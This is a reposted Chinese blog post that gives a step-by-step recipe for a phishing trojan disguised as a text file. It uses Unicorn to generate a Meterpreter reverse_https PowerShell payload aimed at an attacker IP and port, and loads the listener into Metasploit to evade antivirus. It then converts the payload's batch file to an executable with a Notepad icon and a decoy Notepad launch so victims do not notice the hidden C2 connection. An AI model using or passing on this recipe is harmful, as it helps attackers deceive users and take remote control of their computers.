首页 安全文摘 正文

一个免杀钓鱼思路分享

左侧的文件是真实文本文件。右边的文件是PowerShell有效负载,两者看起来基本一模一样,可以看到都是.txt的文件名。打开我们的木马文件跟我们打开笔记本应用没有任何分别。但是我们的木马在后台悄悄执行了。CS MSF等等C2正常上线。1.生成shellcode1.我们使用CS MSF等等C2生成的powershell等shellcode.这里使用MSF演示

左侧的文件是真实文本文件。右边的文件是PowerShell有效负载,两者看起来基本一模一样,可以看到都是.txt的文件名。打开我们的木马文件跟我们打开笔记本应用没有任何分别。

但是我们的木马在后台悄悄执行了。CS MSF等等C2正常上线。


一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第1张

1.生成Shellcode

1.我们使用CS MSF等等C2生成的powershell等shellcode.

这里使用MSF演示。然后为了方便免杀,我们联动一个名为Unicorn的工具来生成shellcode吧。

Unicorn工具的主要作用是将复杂的shellcode有效负载直接注入内存。这样能达到一些免杀的作用。

在kali中使用git clone github.com/trustedsec/unicorn克隆Unicorn GitHub存储库。

进入Unicorn文件目录,然后

./unicorn.py windows/Meterpreter/reverse_https 192.168.50.146 4444

Unicorn将使用Metasploit reverse_https模块通过指定的端口连接到攻击者的ip地址

会生成一个powershell的shellcode文件.txt和一个MSF的配置文件.c

一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第2张

把生成的unicorn.c文件导进MSF中打开

一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第3张

MSF会自动配置监听和其他配置。

我们看看原始的Uniocrn生成shellcode的免杀情况

一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第4张

还不错,其实这个shellcode直接使用也能上线的。但是我们的目的不是这个。

但是我们是钓鱼,钓鱼就一些迷惑的东西。将先前创建的PowerShell有效负载移至Windows系统,并另存为Payload.bat

我们去https://github.com/B00merang-Project/Windows-10-Icons’下载Windows 10图标。


在kali中就使用git下载吧


git clone'https://github.com/B00merang-Project/Windows-10-Icons

该文件中可能不包含内置Windows 10图标的确切副本,但是看起来足够接近,可以很好地利用。也可以在网上设计图标或找到更好的图标

2.将PNG转换为ICO格式

PNG将需要转换为Windows ICO图标格式。可以使用在线工具(如ConvertICO)完成此操作。只需将所需的PNG上传到网站,它将以ICO格式输出。

一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第5张

这里我们使用的是记事本的图标。

安装BAT2EXE

在Windows中,访问以下URL以下载B2E。

https://github.com/tokyoneon/B2E/raw/master/Bat_To_Exe_Converter.zip

解压缩下载文件,然后运行“ Bat_To_Exe_Converter_(Installer).exe”文件进行安装。

一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第6张

导入有效负载BAT

完成后,启动B2E,然后单击“打开”按钮以导入之前创建的payload.bat。

一个免杀钓鱼思路分享 安全文摘 钓鱼思路 安全文摘  第7张

导入木马有效载荷

然后,将单词“ notepad”添加到payload.bat的顶部,然后单击“保存”。在执行PowerShell有效负载之前,这将使可执行文件在Windows计算机上打开记事本。这样做会使目标用户相信他们刚刚单击的文件确实是合法的文本文件。

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1923.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何...

WEB安全 2022-08-21 0 10403

2022年蓝队初级护网总结

2022年蓝队初级护网总结

一. 设备误报如何处理? 答:来自外网的误报说明安全设备需要进行策略升级,不需要处置。如果是来自内网的误报可以和负责人协商一下...

安全文摘 2022-08-21 0 10384

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持